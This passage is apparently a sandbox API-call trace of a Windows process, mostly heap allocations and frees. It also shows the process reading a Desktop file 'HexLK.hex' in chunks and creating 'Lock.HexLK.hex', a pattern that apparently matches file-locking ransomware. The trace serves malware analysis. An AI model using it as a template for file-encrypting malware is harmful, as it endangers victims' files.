1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0180.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0180.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0180.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0180.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0180.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0180.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0180.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0180.386] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0180.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0180.386] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0180.387] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0180.387] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0180.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0180.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0180.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0180.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0180.388] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0180.388] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.388] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0180.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0180.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0180.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0180.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0180.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0180.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0180.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0180.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0180.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0180.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0180.390] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0180.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0180.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0180.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0180.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0180.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0180.390] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hexlk.hex"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0180.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0180.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0180.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0180.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0180.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0180.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0180.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0180.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0180.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0180.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe50020 [0180.395] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0180.395] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.399] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.400] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.402] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.404] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.406] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.408] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.410] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.411] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.414] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.416] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.418] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0180.420] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x4066, lpOverlapped=0x0) returned 1 [0180.421] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0180.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0180.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0180.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xf60020 [0180.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50020 | out: hHeap=0x970000) returned 1 [0180.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0180.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0180.444] HeapFree (in: hHeap=0x970000, 